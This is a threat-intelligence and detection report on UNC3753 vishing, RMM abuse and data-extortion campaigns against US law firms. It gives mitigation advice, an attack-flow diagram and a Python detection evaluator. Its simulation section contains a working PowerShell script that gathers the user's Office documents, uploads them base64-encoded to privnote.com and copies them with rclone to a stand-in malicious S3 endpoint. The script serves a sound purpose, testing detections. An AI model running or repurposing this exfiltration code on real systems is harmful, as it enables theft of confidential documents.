SOC Prime Bias: High

09 Jun 2026 12:25 UTC

Seeking Counsel: Ongoing Targeted Attacks Against US Law Firms

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A financially motivated threat cluster tracked as UNC3753 is running vishing campaigns that trick victims into installing remote monitoring and management software. Once access is established, the actors steal sensitive legal and financial information and then extort the victim organization by threatening public exposure. The campaign is focused on U.S. professional services firms, particularly law firms, and may involve both cyber-enabled and physical data theft.

Investigation

Mandiant observed the complete intrusion cycle, from the initial voice-phishing call to data theft and extortion, sometimes within a single business day. Victims were convinced to use screen-sharing tools and RMM software such as AnyDesk, Bomgar, or a custom SuperOps installer delivered with a curl command. Data exfiltration was carried out using tools such as WinSCP, Rclone, or direct uploads to consumer cloud storage accounts.

Mitigation

Organizations should train staff to recognize vishing attempts, enforce strict verification procedures for any remote support request, and block unauthorized RMM and screen-sharing tools. Disabling removable media, monitoring for unusual outbound transfers to cloud storage or FTP destinations, applying conditional access controls to VDI, and enforcing MFA on critical document repositories can further reduce risk.

Response

If this activity is detected, isolate the affected endpoint immediately, terminate any unauthorized remote sessions, and remove installed RMM binaries. Investigators should collect command-line history, registry changes, and scheduled task artifacts for forensic review. Compromised credentials should be reset, data exfiltration should be assessed, and law enforcement engagement should be considered if extortion has begun.

Attack Flow

    graph TB
      %% Class definitions
      classDef action fill:#99ccff
      classDef tool fill:#ffcc99
      classDef technique fill:#ccccff
      classDef operator fill:#ff9900

      %% Node definitions
      initial_access["<b>Action</b> – <b>T1566.004 Phishing: Spearphishing Voice</b><br/><b>Description</b>: Attacker uses a convincing voice call to trick the target into providing credentials or executing malicious commands."]
      class initial_access action
      user_execution["<b>Action</b> – <b>T1204.002 Malicious File</b><br/><b>Tool</b>: cURL + MSI installer<br/><b>Description</b>: Victim runs a malicious MSI file downloaded via cURL, resulting in code execution on the system."]
      class user_execution action
      remote_desktop["<b>Action</b> – <b>T1219.002 Remote Desktop Software</b><br/><b>Tools</b>: Zoom, Microsoft Teams, AnyDesk<br/><b>Description</b>: Legitimate remote-desktop or meeting applications are abused to maintain persistent remote access."]
      class remote_desktop action
      discovery["<b>Action</b> – <b>T1083 File and Directory Discovery</b> & <b>T1680 Local Storage Discovery</b><br/><b>Description</b>: Adversary enumerates files, directories and local storage locations to locate valuable data for exfiltration."]
      class discovery action
      data_staging["<b>Action</b> – <b>T1074 Data Staged</b> & <b>T1560 Archive Collected Data</b><br/><b>Description</b>: Collected files are staged locally and compressed into archives to prepare for exfiltration."]
      class data_staging action
      exfiltration["<b>Action</b> – <b>T1567.002 Exfiltration to Cloud Storage</b> & <b>T1020 Automated Exfiltration</b><br/><b>Target</b>: Google Drive<br/><b>Description</b>: Automated upload of staged archives to a cloud storage service for remote extraction."]
      class exfiltration action
      physical_media["<b>Action</b> – <b>T1052 Exfiltration Over Physical Medium</b><br/><b>Description</b>: Transfer of data onto removable media for offline exfiltration when network channels are restricted."]
      class physical_media action
      cleanup["<b>Action</b> – <b>T1070.001 Clear Windows Event Logs</b><br/><b>Description</b>: Deletion of Windows event logs to erase evidence of the intrusion."]
      class cleanup action

      %% Edge connections
      initial_access -->|leads_to| user_execution
      user_execution -->|enables| remote_desktop
      remote_desktop -->|enables| discovery
      discovery -->|leads_to| data_staging
      data_staging -->|enables| exfiltration
      exfiltration -->|leads_to| physical_media
      physical_media -->|followed_by| cleanup

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:

    1. Recon & Data Staging (T1005, T1083):
      The adversary enumerates user directories and copies all *.docx and *.xlsx files to a staging folder C:\Temp\StagedData.

    2. Upload via Privnote (T1567.002):
      Using PowerShell, the attacker reads each file, base‑64‑encodes the content, and posts it to https://privnote.com/api/note. The command line includes the URL, which satisfies the selection_privnote condition.

    3. Transfer with Rclone (T1020):
      The attacker runs rclone.exe (downloaded on‑the‑fly) to push the staged files to a malicious S3 bucket. The process name “rclone.exe” matches selection_tool.

    4. Cleanup: Delete the staging folder and any residual binaries.

  • Regression Test Script: (PowerShell – self‑contained, no external dependencies beyond Invoke-WebRequest.)

    # -------------------------------------------------
    # UNC3753 Exfiltration Simulation – PowerShell
    # -------------------------------------------------
    # 1. Prepare staging directory
    $staging = "$env:USERPROFILE\Temp\StagedData"
    New-Item -ItemType Directory -Force -Path $staging | Out-Null

    # 2. Copy sample data (simulate data collection)
    Get-ChildItem -Path "$env:USERPROFILE\Documents" -Include *.docx, *.xlsx -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object { Copy-Item -Path $_.FullName -Destination $staging -Force }

    # 3. Upload each file to Privnote (web-service exfiltration)
    $privnoteUrl = "https://privnote.com/api/note"
    Get-ChildItem -Path $staging -File | ForEach-Object {
        $content = [Convert]::ToBase64String([IO.File]::ReadAllBytes($_.FullName))
        $body = @{ text = $content }
        # The URL appears in the command line -> triggers selection_privnote
        # (note: when run from a .ps1 file the URL is only visible in script-block
        # logging, not the powershell.exe command line, unless launched via -Command)
        Invoke-WebRequest -Uri $privnoteUrl -Method POST -Body $body -UseBasicParsing | Out-Null
    }

    # 4. Download Rclone (if not present) and exfiltrate via S3
    $rcloneExe = "$env:TEMP\rclone.exe"
    if (-not (Test-Path $rcloneExe)) {
        Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "$env:TEMP\rclone.zip"
        Expand-Archive -Path "$env:TEMP\rclone.zip" -DestinationPath $env:TEMP -Force
        Move-Item -Path (Get-ChildItem "$env:TEMP\rclone-*-windows-amd64\rclone.exe").FullName -Destination $rcloneExe -Force
    }

    # Configure a remote (malicious) S3 bucket – the config is written to a temporary file.
    # Built from a joined array rather than a here-string so the block stays valid when
    # indented (a here-string terminator must start in column 1).
    $rcloneConfig = @(
        "[malicious]",
        "type = s3",
        "provider = AWS",
        "access_key_id = AKIAFAKEKEY",
        "secret_access_key = fakeSecretKey123",
        "region = us-east-1",
        "endpoint = https://malicious-s3.example.com"
    ) -join "`n"
    $configPath = "$env:TEMP\rclone.conf"
    $rcloneConfig | Set-Content -Path $configPath -Encoding ASCII

    # Execute rclone copy – process name "rclone.exe" triggers selection_tool
    & $rcloneExe copy $staging "malicious:exfil" --config $configPath --log-level INFO

    # 5. Cleanup
    Remove-Item -Recurse -Force $staging
    Remove-Item -Force $rcloneExe, $configPath

  • Cleanup Commands:

    # Terminate any lingering WinSCP or Rclone processes
    Get-Process -Name WinSCP, rclone -ErrorAction SilentlyContinue | Stop-Process -Force

    # Delete temporary files left behind (if any)
    Remove-Item -Path "$env:TEMP\WinSCP.exe","$env:TEMP\WinSCP.zip","$env:TEMP\rclone.zip","$env:TEMP\rclone-*-windows-amd64" -Recurse -Force -ErrorAction SilentlyContinue
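
As an added example (not SOC Prime's rule or code), the two selections the attack narrative names, selection_privnote and selection_tool, evaluated over constructed process-creation events so the regression test above can be checked offline. Field names follow Sysmon Event ID 1 and are an assumption, as is the extra OriginalFileName check that also catches a renamed rclone binary; all sample events are constructed.

```python
import re

# Assumed event shape: Sysmon Event ID 1-style fields (Image, CommandLine,
# OriginalFileName); field names and all sample values are assumptions/constructed.
PRIVNOTE_RE = re.compile(r"privnote\.com", re.IGNORECASE)
EXFIL_TOOLS = {"rclone.exe", "winscp.exe"}  # tools named in the report

def _basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def selection_privnote(event: dict) -> bool:
    """Command line references privnote.com (the web-service upload step)."""
    return bool(PRIVNOTE_RE.search(event.get("CommandLine", "")))

def selection_tool(event: dict) -> bool:
    """Image is a known exfil tool; OriginalFileName (PE version resource as
    logged by Sysmon) is checked too, so a renamed copy still matches."""
    names = {_basename(event.get("Image", "")), event.get("OriginalFileName", "").lower()}
    return bool(names & EXFIL_TOOLS)

def evaluate(event: dict) -> list:
    """Names of the selections this event satisfies (empty list = no alert)."""
    hits = []
    if selection_privnote(event):
        hits.append("selection_privnote")
    if selection_tool(event):
        hits.append("selection_tool")
    return hits

def triage(events: list) -> list:
    """(index, selections) for every event that fires at least one selection."""
    return [(i, h) for i, e in enumerate(events) if (h := evaluate(e))]

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Invoke-WebRequest -Uri https://privnote.com/api/note -Method POST",
     "OriginalFileName": "PowerShell.EXE"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\rclone.exe",
     "CommandLine": r"rclone.exe copy C:\Users\alice\Temp\StagedData malicious:exfil",
     "OriginalFileName": "rclone.exe"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\update.exe",  # renamed rclone copy
     "CommandLine": r"update.exe copy C:\Users\alice\Temp\StagedData remote:bucket",
     "OriginalFileName": "rclone.exe"},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"WINWORD.EXE /n C:\Users\alice\Documents\brief.docx",
     "OriginalFileName": "WinWord.exe"},
]
```

Running triage(SAMPLE_EVENTS) flags the first three events and leaves the Word launch alone; the renamed copy is caught only because of the OriginalFileName check, which is the gap an image-name-only rule leaves open.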

End of Report